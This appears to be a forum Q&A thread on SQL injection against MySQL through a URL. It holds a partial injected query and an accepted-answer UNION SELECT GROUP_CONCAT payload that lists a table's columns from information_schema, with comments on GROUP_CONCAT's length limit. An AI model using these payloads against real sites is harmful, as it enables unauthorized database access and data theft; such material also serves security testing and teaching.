# sql injection: use WHERE statement in address bar

Tags: sql-injection, mysql

How can i use "Where" statement during an sql-injection attack in address bar ?
 
for example:

```
... from+information_schema.TABLES+where+TABLE_SCHEMA+=+XXXX--
```

The code above does not work.

Answer (score 3, accepted):

You can retrieve the columns for a specific table with this request :

```
UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
```

Source : http://www.websec.ca/kb/sql_injection#MySQL_Tables_And_Columns

Comment: Does GROUP_CONCAT() has any limit in number of rows?

Comment: @Siamak.A.M No, but it has a character length limit. See [group_concat_max_len](http://dev.mysql.com/doc/refman/5.0/en/server-system-variables.html#sysvar_group_concat_max_len)